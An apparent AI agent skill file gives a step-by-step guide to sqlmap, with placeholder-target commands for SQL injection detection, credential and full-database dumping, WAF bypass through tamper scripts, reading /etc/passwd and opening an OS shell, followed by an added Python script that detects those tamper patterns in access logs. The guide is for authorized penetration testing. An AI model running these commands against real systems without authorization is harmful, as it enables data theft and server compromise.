> sqlmap
Detect and exploit SQL injection with sqlmap. Use when a user asks to test for SQL injection, extract database contents, bypass authentication via SQLi, automate injection testing, or dump database schemas.
Overview
sqlmap automates SQL injection detection and exploitation. It supports all major databases (MySQL, PostgreSQL, MSSQL, Oracle, SQLite), all injection techniques (boolean-blind, time-blind, error-based, UNION, stacked queries), and can extract entire databases, read/write files on the server, and execute OS commands through SQL injection.
Instructions
Step 1: Basic Detection
# Test a URL parameter for SQL injection
sqlmap -u "https://target.example.com/products?id=1" --batch
# --batch: use defaults for all prompts (non-interactive)
# Test POST parameters
sqlmap -u "https://target.example.com/login" \
--data="username=admin&password=test" \
--batch
# Test with cookies and headers (authenticated sessions)
sqlmap -u "https://target.example.com/api/user?id=1" \
--cookie="session=abc123" \
--headers="Authorization: Bearer eyJ..." \
--batch
# Specify which parameter to test
sqlmap -u "https://target.example.com/search?q=test&category=1&page=1" \
-p "category" \
--batch
Step 2: Database Enumeration
# List all databases
sqlmap -u "https://target.example.com/products?id=1" --dbs --batch
# List tables in a database
sqlmap -u "https://target.example.com/products?id=1" \
-D webapp_db --tables --batch
# List columns in a table
sqlmap -u "https://target.example.com/products?id=1" \
-D webapp_db -T users --columns --batch
# Dump specific columns (e.g., credentials)
sqlmap -u "https://target.example.com/products?id=1" \
-D webapp_db -T users -C "username,email,password_hash" --dump --batch
# Dump everything (use cautiously)
sqlmap -u "https://target.example.com/products?id=1" \
-D webapp_db --dump-all --batch
Step 3: Advanced Techniques
# Specify injection technique
sqlmap -u "https://target.example.com/products?id=1" \
--technique=BT --batch
# B: Boolean-blind, T: Time-blind, E: Error-based
# U: UNION, S: Stacked queries, Q: Inline queries
# Tamper scripts for WAF bypass
sqlmap -u "https://target.example.com/products?id=1" \
--tamper=space2comment,between,randomcase \
--random-agent --batch
# space2comment: replaces spaces with /**/
# between: replaces > with NOT BETWEEN 0 AND
# randomcase: randomizes keyword case
# Test REST API JSON parameters
# (sqlmap has no --content-type option; set the Content-Type header with --headers)
sqlmap -u "https://target.example.com/api/search" \
--data='{"query":"test","limit":10}' \
--headers="Content-Type: application/json" \
-p "query" --batch
# Level and risk increase (deeper testing)
sqlmap -u "https://target.example.com/products?id=1" \
--level=5 --risk=3 --batch
# level 5: tests cookies, User-Agent, Referer, all params
# risk 3: includes heavy time-blind and OR-based tests
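The defender's view of the Step 3 options, as an added example that is not part of the original skill: a log check for the three tamper transformations listed above plus sqlmap's default User-Agent, which is the one indicator `--random-agent` removes. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2025:10:00:00 +0000] "GET /products?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [01/Jan/2025:10:00:01 +0000] "GET /products?id=1%20AND%205=5 HTTP/1.1" 200 512 "-" "sqlmap/1.8#stable (https://sqlmap.org)"',
    '203.0.113.9 - - [01/Jan/2025:10:00:02 +0000] "GET /products?id=1/**/AND/**/5=5 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0)"',
    '203.0.113.9 - - [01/Jan/2025:10:00:03 +0000] "GET /products?id=1%20AND%207%20NOT%20BETWEEN%200%20AND%203 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0)"',
    '203.0.113.9 - - [01/Jan/2025:10:00:04 +0000] "GET /products?id=1%20uNiOn%20SeLeCt%20NULL HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0)"',
]

LINE_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" \d+ \S+ "[^"]*" "([^"]*)"')
KEYWORD_RE = re.compile(r"\b(select|union|and|or|where|from|between)\b", re.I)
GAP = r"(?:\s|/\*\*/)+"  # whitespace or the /**/ that space2comment substitutes
BETWEEN_RE = re.compile(rf"not{GAP}between{GAP}0{GAP}and", re.I)


def is_mixed_case(word):
    """True for 'SeLeCt' but not 'select', 'SELECT' or 'Select'."""
    return not (word.islower() or word.isupper() or word.istitle())


def classify(line):
    """Return (client_ip, [indicator names]) for one log line, or None if unparsable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, target, user_agent = m.groups()
    query = unquote_plus(target.partition("?")[2])  # decode %20 and + before matching
    hits = []
    if user_agent.lower().startswith("sqlmap/"):  # gone once --random-agent is used
        hits.append("default-user-agent")
    if re.search(r"\w/\*\*/\w", query):
        hits.append("space2comment")
    if BETWEEN_RE.search(query):
        hits.append("between")
    if any(is_mixed_case(w) for w in KEYWORD_RE.findall(query)):
        hits.append("randomcase")
    return ip, hits


def summarize(lines):
    """Map each client IP to the set of indicators seen across its requests."""
    seen = {}
    for parsed in filter(None, map(classify, lines)):
        seen.setdefault(parsed[0], set()).update(parsed[1])
    return seen


if __name__ == "__main__":
    for ip, indicators in summarize(SAMPLE_LOG).items():
        print(ip, sorted(indicators) or "clean")
```

Matching runs on the URL-decoded query string, so percent-encoded spaces and keywords are caught; request bodies (POST and JSON parameters) are not in an access log and need the same checks applied at the application or WAF layer.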
Step 4: Post-Exploitation
# Read files from server (if DB user has FILE privilege)
sqlmap -u "https://target.example.com/products?id=1" \
--file-read="/etc/passwd" --batch
# Get an OS shell (stacked queries + privileges needed)
sqlmap -u "https://target.example.com/products?id=1" \
--os-shell --batch
# Get a SQL shell
sqlmap -u "https://target.example.com/products?id=1" \
--sql-shell --batch
# Check current DB user and privileges
sqlmap -u "https://target.example.com/products?id=1" \
--current-user --current-db --is-dba --batch
Step 5: Crawl and Test Entire Application
# Crawl the site and test all found parameters
sqlmap -u "https://target.example.com/" \
--crawl=3 --batch --forms
# --crawl=3: follow links up to depth 3
# --forms: test HTML form parameters too
# Use a Burp/ZAP request file
sqlmap -r captured-request.txt --batch
# captured-request.txt is a raw HTTP request file
Guidelines
- Always have written authorization. SQL injection testing against unauthorized targets is illegal.
- Start with --batch --level=1 --risk=1 (defaults). Increase level/risk only if needed.
- --batch mode is essential for automation — prevents interactive prompts.
- Time-blind injection is slow. Use --threads=10 to speed up extraction.
- Tamper scripts bypass WAFs. Common: space2comment, between, charencode, randomcase.
- Use -r request.txt with Burp Suite exported requests for complex auth flows.
- --dump extracts data. In a real pentest, dump only what proves the vulnerability — not the entire database.
- sqlmap auto-detects the DBMS. Use --dbms=mysql to skip detection (faster).